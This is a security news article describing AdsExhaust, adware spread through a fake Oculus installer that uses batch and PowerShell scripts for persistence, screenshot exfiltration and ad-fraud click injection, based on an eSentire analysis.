WARNING! New Adware Targets Users Seeking Meta Quest App for Windows

A fake Oculus installer distributed adware named AdsExhaust in June 2024, which steals screenshots and injects simulated keystrokes into browsers. By automating clicks and redirects, it generates revenue for attackers by manipulating ads and potentially bypassing user authentication. 

A malicious website targeting Oculus app seekers tricks users into downloading an archive containing an initial batch script (“oculus-app.EXE”), which infects the system by contacting a command-and-control server to download a secondary script (“backup.bat”), creating “backup.bat,” which retrieves a third script (“update.bat”), and scheduling these scripts to run at designated times. 

The initial script also initiates a download of what appears to be the legitimate Oculus application from a suspicious URL. 

The backup.bat file functions as a downloader and task scheduler and retrieves additional scripts, likely malicious in nature, written in VBScript and PowerShell, which are then strategically placed within the user’s profile directory (AppData\Local\wespmail) for persistence. 

By creating new scheduled tasks, the backup.bat file ensures the downloaded scripts are executed repeatedly, potentially solidifying the attacker’s presence on the compromised system. 

A scheduled task triggers a PowerShell script that runs continuously for 9 minutes by fetching IP information, capturing a system screenshot, and then monitoring a specific log file, encoding new content, and updating a counter if changes occur. 

System details and file metadata are collected from a designated directory, along with the base64-encoded screenshot and log changes, and assembled into a JSON payload. The script transmits the payload to a remote server and modifies a file based on the response. 

After deleting the screenshot and waiting 15 seconds, the loop restarts. The script also searches for a specific string in the response, extracts and encodes any following data, and stores it in another file. 

AdsExhaust adware disguised within a PowerShell payload checks for a running Microsoft Edge browser and a user idle time of over 9 minutes. Upon meeting these conditions, the script injects clicks, opens new tabs with embedded URLs, and scrolls the pages erratically. 

These actions aim to simulate user interaction and potentially trigger ads for fraudulent revenue generation, while the random clicks within specific coordinates further suggest targeted manipulation of advertising areas. 

According to the eSentire Threat Response Unit (TRU), it employs several techniques to manipulate user interaction, generate fraudulent ad revenue, monitor for user activity and close the browser window upon detection. 

The adware then captures a screenshot and creates an overlay to mask its actions, and if Microsoft Edge is open, it searches for the word “sponsored” and attempts to click on it. 

It also retrieves keywords from a malicious server and uses them to initiate Google searches via Edge, which allows AdsExhaust to operate undetected while generating revenue for attackers. 

Also Read:

• DNSBomb: Researchers Unveil Devastating New DNS DoS Attack
• Hackers Exploit Progressive Web Apps for Phishing Attacks